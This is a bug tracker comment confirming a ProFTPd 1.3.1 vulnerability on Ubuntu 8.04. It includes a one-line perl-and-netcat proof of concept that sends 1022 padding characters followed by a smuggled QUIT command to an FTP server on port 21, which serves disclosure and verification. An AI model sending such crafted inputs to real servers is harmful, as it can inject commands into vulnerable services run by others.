Comment 4 for bug 310949

Revision history for this message
Patrick Burleson (pburleson) wrote :

I have just confirmed this bug using the command from the Debian Bug linked in this report.

perl -e 'print "A"x1022,"QUIT\n"' | nc localhost 21

I checked this against a fully updated Hardy Heron 8.04 LTS system running ProFTPd 1.3.1-6ubuntu1.

If the command above prints out "Goodbye", then the version of ProFTPd is vulnerable.